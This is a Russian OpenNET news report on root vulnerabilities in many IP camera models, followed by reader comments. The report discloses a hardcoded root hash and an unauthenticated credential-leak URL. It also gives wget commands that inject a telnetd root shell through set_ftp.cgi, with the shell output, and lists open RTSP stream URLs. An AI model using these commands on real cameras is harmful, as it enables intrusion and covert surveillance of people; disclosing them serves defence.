The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Более тысячи моделей IP-камер подвержены root-уязвимости

11.03.2017 11:26

В результате изучения прошивки камеры Wireless IP Camera (P2P) WIFICAM была выявлена возможность удалённого доступа к устройству с правами root, используя жестко прописанный в прошивке пароль. Более детальный разбор показал, что в прошивке также присутствуют и другие уязвимости, позволяющие выполнить свой код с правами root, в том числе обнаружена уязвимость в http-сервере GoAhead, который используется многими другими производителями IP-камер.

Так как камера Wireless IP Camera (P2P) WIFICAM построена на типовой платформе, на основе которой выпускаются многие другие модели IP-камер, некоторые уязвимости проявляются и в моделях других производителей. В сумме проблемам оказались подвержены около 1250 различных моделей камер. Сканирование сети через севис Shodan выявило более 185 тысяч уязвимых устройств. Миллионы камер во внутренних подсетях потенциально уязвимы для атак через облачную инфраструктуру.

Среди уязвимых отмечены некоторых модели камер 3com, 7Links, A4Tech, APKLINK, AQUILA, AVACOM, Acromedia, Agasio, Airsight, Alecto, Allnet, Apexis, Atheros, Bionics, Chinavasion, D-Link, Dericam, EST, EasyCam, EasyN, Elro, EyeCam, Foscam, GoAhead, Heden, iView ,ICam, Kogan, LifeTech, Logitech, Maginon, Mediatech, Netcam, Pixpo, Polariod, Provision, Pyle, Scricam, skylink, Skytronic, SmartEye, Sricam, Sricctv, StarCam, Sumpple, Suneyes, Supra+Space, Swann, Techview, Tenvis, Vantech, Vstarcam, Wanscam, Wansview, X10 и т.д.

Выявленные уязвимости:

  • В прошивке определён фиксированный пароль root ("root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh") и по умолчанию запущен сервис "telnetd". Для входа с правами root достаточно подобрать пароль по хэшу и подключиться при помощи telnet;
  • В прошивке сохранён закрытый RSA-ключ для Apple Production iOS Push Services (/system/www/pem/ck.pem);
  • Утечка информации в http-сервере GoAhead, позволяющая получить информацию об учётных записях. Параметры доступа сохраняются в файлах system.ini и system-b.ini, на которые присутствуют символические ссылки из директории для отдачи данных в Web. Из-за ошибки, в отличии от cgi-скриптов, требующих аутентификации, к файлам можно обратиться без аутентификации, указав пустые логин и пароль. Например, для получения параметров входа достаточно запросить файл "http://192.168.1.1/system.ini?loginuse&loginpas";
  • Через манипуляции со скриптом set_ftp.cgi, предназначенным для настройки доступа по FTP, можно выполнить произвольную команду с правами root через подстановку shell-конструкции "$(...)". Например, для запуска процесса telnetd для входа без пароля можно выполнить:
    
       $ wget -qO- 'http://192.168.1.1/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'
    
       $ wget -qO- 'http://192.168.1.1/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'
    
       $ telnet 192.168.1.107 25
       Trying 192.168.1.107...
       Connected to 192.168.1.107.
       Escape character is '^]'.
    
       / # id
       uid=0(root) gid=0
    
    

    Комбинируя данную уязвимость с утечкой параметров аутентификации, можно обеспечить удалённый вход на камеру с правами root. Для упрощения проведения атаки и организации обратного канала связи для обхода межсетевого экрана подготовлен универсальный эксплоит.

  • Возможность просмотра передаваемых камерой видеоматериалов без аутентификации. Для просмотра достаточно обратиться к TCP-порту 10554 по протоколу RTSP, например "vlc rstp://192.168.1.1:10554/tcp/av0_1" или "vlc rstp://192.168.1.1:10554/tcp/av0_0";
  • По умолчанию камера обеспечивает работу с облачными сервисами, что позволяет использовать мобильные приложения для управления камерой, размещённой за транслятором адресов или межсетевым экраном. По умолчанию камера периодически отправляет UDP-пакеты к сервисам www.baidu.com, openapi.xg.qq.com и ряду жестко прошитых IP-адресов. Протокол взаимодействия с облачными сервисами достаточно простой и не использует шифрование. В качестве идентификатора для подключения к камере через облачную сеть используется серийный номер, что позволяет зная или подобрав серийный номер, подключиться к камере во внутренней подсети, к которой нет прямого доступа из интернет.

Дополнительно можно отметить выявленную другими исследователями уязвимость в CCTV и IP-камерах компании Dahua Techology. Уязвимость позволяет внешнему неаутентифицируемому атакующему загрузить содержимое базы с именами и паролями пользователей устройства, в том числе учётной записью администратора. Атака сводится к загрузке файла с учётными записями и входу на устройство с полученными параметрами администратора. Рабочий эксплоит планируется опубликовать 5 апреля, дав пользователям время на установку обновления.

  1. Главная ссылка к новости (https://pierrekim.github.io/bl...)
  2. OpenNews: Выявлен метод получения root-доступа на цифровую камеру Samsung NX-300, основанную на Tizen
  3. OpenNews: Зафиксирована атака с подстановкой бэкдора в маршрутизаторы Cisco
  4. OpenNews: Волна атак на клиентские маршрутизаторы
  5. OpenNews: Легко эксплуатируемая критическая уязвимость в маршрутизаторах Netgear
  6. OpenNews: В маршрутизаторах Netgear выявлена уязвимость, позволяющая узнать пароль входа
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/46175-ipcamera
Ключевые слова: ipcamera, security
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (63) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (-), 20:57, 11/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +5 +/
    Богата земля китайская дырявыми устройствами
     
     
  • 2.6, Аноним (-), 22:12, 11/03/2017 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Да это вполне ожидаемо, если учесть, что так называемые эмбеддеры, разрабатывающие данные устройства, сидят под вантузом, запуская gcc.exe и ld.so.exe. Отсутствие личной гигиены - одна из основных проблем.
     
     
  • 3.7, Аноним (-), 22:34, 11/03/2017 [^] [^^] [^^^] [ответить]  
  • –4 +/
    может по тому что ленятся модифицировать референс код ?
    Да и дорого это.. для устройств за 10 баксов.
     
     
  • 4.24, Аноним (-), 10:48, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Лучше бы они этого не делали, ибо см. выше.
     
  • 3.38, Аноним (-), 20:18, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > ld.so.exe

    o_O

     
     
  • 4.44, нежданчик (?), 04:58, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    ГЫ-ксперт в наличии =)
     
  • 2.46, Sen (?), 11:03, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • –2 +/
    А россейская вечно недовольными коментаторами-бездельниками...
     

  • 1.2, Аноним (-), 20:59, 11/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    А почему д этого комментарии не отправлялись?
     
     
  • 2.5, Аноним (-), 22:09, 11/03/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Наверное боялись, что работники гетиша dahua сольют o dahua.
     

  • 1.3, Аноним (-), 21:28, 11/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +22 +/
    > Dahua Techology
    > DahuaSecurity.com

    Даже добавить нечего.

     
     
  • 2.18, Аноним (-), 01:40, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    >http-сервере GoAhead
    >GoAhead
    >уязвимость
     

  • 1.8, DeerFriend (?), 22:54, 11/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    А есть для таких камер аналоги опенврт?
     
     
  • 2.28, AlexYeCu (ok), 13:56, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Raspberry или другой SoC + хоть родная камера, хоть вебка.
    В принципе, что-то можно нашаманить даже на Arduino с её родной камерой, но вот насколько оно рабочее — я пока не знаю.
     
  • 2.40, Michael Shigorin (ok), 21:02, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > А есть для таких камер аналоги опенврт?

    Хозяйке на заметку: https://packages.altlinux.org/vargus (чтоб хоть это не изобретать).

     
     
  • 3.68, DeerFriend (?), 21:19, 14/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Я не понимать, как этот vargus можно установить на видеокамеру?

    Вопрос был о прошивке для камер с целью получения однородной инфраструктуры, при покупке устройств разных вендоров.

     
     
  • 4.69, Michael Shigorin (ok), 21:24, 14/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Вопрос был о прошивке для камер

    Не, это не прошивка...

     

  • 1.9, Sabakwaka (ok), 23:12, 11/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Удаленный вход по 192.168.х.х?

    Это ж убиться насмерть надо, чтобы свою IP камеру в Сеть показать!

     
     
  • 2.10, XoRe (ok), 23:49, 11/03/2017 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > Это ж убиться насмерть надо, чтобы свою IP камеру в Сеть показать!

    Вы даже не представляете, сколько их...

     
     
  • 3.23, user (??), 05:16, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Смерть приватности: как камеры слежения становятся игрушкой хакеров
    http://www.bbc.com/russian/features-38929977
     
  • 2.11, Анон_ (?), 23:51, 11/03/2017 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > Это ж убиться насмерть надо, чтобы свою IP камеру в Сеть показать!

    убьешься ты, наоборот, городить защищенную сеть для "своих" ip-камер.
    В случае, конечно, если тебе доверят что-то посложнее localhost. Мы для этого и только для этого запускали у себя ipv6, совершенно не от хорошей жизни.

    И прятать видео с камер, на минуточку, _наблюдения_, установленных в общественных местах (то есть не в офисном сортире, а на воротах, на автозаправке, да хоть на внешнем периметре) под табличками "ведется видеонаблюдение", смысла совершенно нет. Кроме вот одного ньюанса, да, что делают эти прошивки - китайские рукожопы.

     
     
  • 3.15, Sabakwaka (ok), 00:52, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +3 +/
    >> Это ж убиться насмерть надо, чтобы свою IP камеру в Сеть показать!
    > убьешься ты, наоборот, городить защищенную сеть для "своих" ip-камер.

    «Сеть для своих камер», простите, должна быть локальной и приезжать видео с камер на ваш сервер видеонаблюдения должно по локалке.

    А с видеосервером уже городите что хотите.

    А то, по логике «убьешься городить защищенную сеть для ip-камер» — надо все 127.0.0.1 машины мира за отдельную плату выставить в Сеть и потом убиваться их защищать?

    IP для камеры — это просто для того, чтобы не использовать карты видеозахвата с 64-ми RCA сосками и медью обхватом полметра.

    Зачем просовывать камеру дальше 192.168/24???


     
     
  • 4.19, Crazy Alex (??), 02:09, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • –5 +/
    Затем, что это может быть куча расположенных в различных местах/городах/странах объектов. И, как правильно заметили, прятать там зачастую нечего.

    Ну да, можно VPN нагородить, но зачем?

     
     
  • 5.27, YetAnotherOnanym (ok), 13:46, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Например, затем, чтобы злоумышленник, планирующий ограбление склада, не мог провести разведку и спланировать свои действия.
    Да, у меня параноя и синдром вахтёра. Как будто это что-то плохое.
     
     
  • 6.43, Crazy Alex (??), 01:14, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Оценивать надо... Подозреваю, что оно того не окупит. По нынешним временам злоумышленнику провести съёмку самостоятельно - абсолютно не проблема, и с копеечными затратами. И чем дальше - тем проще.

    Насчёт плохое или нет - опять же, считать надо.

     
  • 4.22, _ (??), 04:08, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >Зачем просовывать камеру дальше 192.168/24???

    192.168.0.0/16 Ыгсперт Д,Б! :-)))

     
     
  • 5.29, Sabakwaka (ok), 14:40, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    >>Зачем просовывать камеру дальше 192.168/24???
    > 192.168.0.0/16 Ыгсперт Д,Б! :-)))

    24, кловун, 24.

     
  • 5.41, Michael Shigorin (ok), 21:02, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    >>Зачем просовывать камеру дальше 192.168/24???
    > 192.168.0.0/16

    Зачем вся /16-то?

     
     
  • 6.45, тигар (ok), 09:09, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >>>Зачем просовывать камеру дальше 192.168/24???
    >> 192.168.0.0/16
    > Зачем вся /16-то?

    потому что CIDR 192.168/24 немножко invalid ? думаю, что именно на это намекали. и шоб не гадать предпоследний октет предположили, что иксперт имел ввиду именно /16

     
     
  • 7.47, Michael Shigorin (ok), 12:02, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    >>>>Зачем просовывать камеру дальше 192.168/24???
    >>> 192.168.0.0/16
    >> Зачем вся /16-то?
    > и шоб не гадать предпоследний октет

    Я прочёл как any практически на автомате. :)

     
  • 4.62, Анон_ (?), 20:30, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > «Сеть для своих камер», простите, должна быть локальной

    кому должна - админу локалхоста? Целых две камеры, одна в домофоне, вторая в сортире?

    > А то, по логике «убьешься городить защищенную сеть для ip-камер» — надо все 127.0.0.1
    > машины мира за отдельную плату выставить в Сеть и потом убиваться их защищать?

    они во-первых и так в сети - через наты, cloud management (о котором ты можешь даже не знать), те же upnp, всюдупролезающий 624 и т д.
    Во-вторых, это перестали делать не потому, что кто-то, кроме чайников "убьется защищать", а потому что адреса в основном достались нужным людям (не надо повторять сказок об их "исчерпании").

    > Зачем просовывать камеру дальше 192.168/24???

    затем, что оно не то что в /24, а в /8 может не поместиться. Особенно если эту сеть хоть как-то сегментировать (опять таки не из идиотской хакеробоязни, а потому, что по другому такие сети не строят) К тому же они умеют мультикаст, поэтому, внезапно, могут без спросу обнаруживаться весьма далеко от своего сегмента (и пакетики ходят, в пределах инфраструктуры, если специально мер не принять - привет, dlink)

    Сюрприз, да, что такие сети (и именно камерные - как раз вполне распространенный массовый клиент) бывают, никогда больше /24 не видел?

     
  • 2.34, Аноним (-), 17:53, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Дело в том, что они не в курсе про то что они в интернете видны. Проблема в скрвисе UPnP который осуществляет проброс 81 порта на внешний интерфейс. Собственно в нем вся проблема и есть. Ну а вторая проблема это конечно невнимательность к своей домашней сети и маломальски кривые настройки роутеров.
     
     
  • 3.37, Sabakwaka (ok), 18:34, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Дело в том, что они не в курсе про то что они
    > в интернете видны. Проблема в скрвисе UPnP который осуществляет проброс 81
    > порта на внешний интерфейс.

    И кто же дарит им услуги DNS???

    Где это место??? Дайте два!

     
  • 2.48, Аноним (-), 12:44, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Они сильно умные/облачные теперь, и могут нетривиальными способами к нему коннектится, ты ставишь роутер и думаешь, ну да мне для компа нужны такие настройки, а тут камера которая в локалке берёт и пробивает себе через UPnP канальчик, а то и другими хитрыми способами :)
     
     
  • 3.49, Аноним (-), 12:45, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Они сильно умные/облачные теперь, и могут нетривиальными способами к нему коннектится,
    > ты ставишь роутер и думаешь, ну да мне для компа нужны
    > такие настройки, а тут камера которая в локалке берёт и пробивает
    > себе через UPnP канальчик, а то и другими хитрыми способами :)

    ( вплоть до коннекта к ней через wifi соседа ;) )

     
  • 3.57, Sabakwaka (ok), 17:59, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Они сильно умные/облачные теперь, и могут нетривиальными способами к нему коннектится,
    > ты ставишь роутер и думаешь, ну да мне для компа нужны
    > такие настройки, а тут камера которая в локалке берёт и пробивает
    > себе через UPnP канальчик, а то и другими хитрыми способами :)

    Хто платит за DNS??? Почему мне не бесплатно, а им нахаляву??? :(

     
     
  • 4.63, Анон_ (?), 20:33, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Хто платит за DNS??? Почему мне не бесплатно, а им нахаляву??? :(

    потому что ты поленился погуглить дальше первых двух строчек, а там уже действительно затрахались и начали собирать абонентку?

    Хинт: каждый юзер волшебного японского средства от админо-полицейского файрвольного поноса, автомагически, пополняет собой некий японский dns, например. Если не успел отключить до первого тестового запуска вне закрытого окружения.


     

  • 1.12, incker (?), 00:10, 12/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А я не так давно ржал, что последнем в фильме Форсаж хакают камеры.
    Еще от части напомнило игру watch dogs (кажется так называется)
     
  • 1.13, Аноним (13), 00:13, 12/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    как правило установщики этих камер по всей нашей стране, люди неквалифицированные и недалекие. грамотные специалисты конечно же есть, но их очень мало, и они дорогие, поэтому работодатели жмут их себе нанимать, и превлекают только если уж прижмет сильно сильно.поэтому и стоят понапиханные везде из за психических расстройств у  начальства,  эти камеры и регистраторы, с тем что пришло из коробки. и стоять будут, пока конечно они не сгорят.  
     
  • 1.14, Ilya Indigo (ok), 00:19, 12/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Я в шоке от кол-ва зондов одновременно, на любой вкус у такого внушительного кол-ва производителей.
     
     
  • 2.16, Sabakwaka (ok), 00:56, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > Я в шоке от кол-ва зондов одновременно, на любой вкус у такого
    > внушительного кол-ва производителей.

    Никто не предполагает, что существуют мурзилы, прокидывающие камеры в Интернет.

    Производители уверены в том, что их видеокамеры сдают сигнал на серверы наблюдения по ЛОКАЛКЕ.


     
     
  • 3.39, Аноним (-), 20:26, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Производители уверены в том, что их видеокамеры сдают сигнал на серверы наблюдения
    > по ЛОКАЛКЕ.

    Если бы даже это было и так (а это не так, см. документацию любой IP-камеры), что, давать кому угодно из локалки рута — нормально, что ли?

     
     
  • 4.59, Аноним (-), 18:50, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Сэр, это старая традиция подоконников!
     
  • 3.51, tonys (??), 13:06, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Неправда. Все производители камер видеонаблюдения как раз и расхваливают фичу удаленного наблюдения за происходящим дома. Картинки во всех рекламных буклетах.
     

  • 1.17, Аноним (-), 01:18, 12/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    rtsp может всё таки в VLC открывать?
    (real time streaming protocol)
     
     
  • 2.35, Аноним (-), 17:55, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > rtsp может всё таки в VLC открывать?
    > (real time streaming protocol)

    Не тут как выяснилось RTSP не мапит локальный сервис UPnP так что только HTTP.

     

  • 1.20, Черный Властелин (?), 03:29, 12/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    IoT во все поля
     
     
  • 2.32, Аноним (-), 16:24, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > IoT во все поля

    Пока что просто демка.


     

  • 1.21, Аноним (-), 03:44, 12/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    можно подсматривать как набирают пароли в танчики
     
  • 1.25, бедный буратино (ok), 13:04, 12/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    а где сам пароль?
    а где ссылки на интересные стримы?
     
     
  • 2.30, Антон (??), 14:51, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • –2 +/
    на дваче
     
     
  • 3.42, Аноним (-), 21:10, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > Server not found
    > Firefox can't find the server at 2ch.ru.
     
     
  • 4.58, Аноним (-), 18:34, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Goodnight, sweet prince.
     
  • 3.60, Аноним (-), 18:51, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    НСБ!
     

  • 1.26, Аноним (-), 13:11, 12/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Сколько-сколько? А почему в DNS_е через дорогу не продают ни одной?

    Посоветуйте IP-рацию. Нучжно чтобы она устанавливала контакт с роутером по Wi-Fi. На роутере поднят сервер Mumble. В момент, когда человек тыкает по кнопке, на всех устройтвах воспроихводится что он говорит.

     
     
  • 2.31, name (??), 15:49, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Только у них через интернет
    https://play.google.com/store/apps/details?id=smile.m1project
     
  • 2.33, AlexYeCu (ok), 17:31, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >Посоветуйте IP-рацию.
    >На роутере поднят сервер Mumble.

    Экий ты затейник. Пожалуй, послежу за веткой — вдруг кто чего дельного присоветует? А то тоже подобное искал, но ничего лучше самопала на одноплатнике или софтины на Андроид-девайсе не придумал.

     
  • 2.36, Аноним (-), 17:57, 12/03/2017 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Сколько-сколько? А почему в DNS_е через дорогу не продают ни одной?
    > Посоветуйте IP-рацию. Нучжно чтобы она устанавливала контакт с роутером по Wi-Fi. На
    > роутере поднят сервер Mumble. В момент, когда человек тыкает по кнопке,
    > на всех устройтвах воспроихводится что он говорит.

    вы ТЗ не туда отправили надо в китай слать там все бракоделы )))

     

  • 1.54, Аномномномнимус (?), 13:47, 13/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А подсоветуйте какой софт к этим "широко распространённым" камерам, чтобы можно было ими вертеть, ночной/дневной режим переключать и микрофон юзать? А то у них либо надо ставить какой-то шлак для IE (что уже абсурдно), либо ставить прилагу из плеймаркета гуглового на смартфон. В остальных вариантах оный функционал не работает
     
     
  • 2.61, Uopwd (?), 19:14, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • –2 +/
    шлак под IE работает как надо, и микрофон и динамики, и практически всё остальное
     
     
  • 3.66, Аномномномнимус (?), 23:27, 13/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Нет. Нормально, из того что опробовано, работает только андроидное приложение.
     
  • 2.70, Андрей (??), 23:24, 14/03/2017 [^] [^^] [^^^] [ответить]  
  • +/
    У beward'a вроде есть подобные приложения
     

  • 1.72, Аноним (-), 13:28, 20/03/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Как эксплоит-то запустить, Бэтмэны ?
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру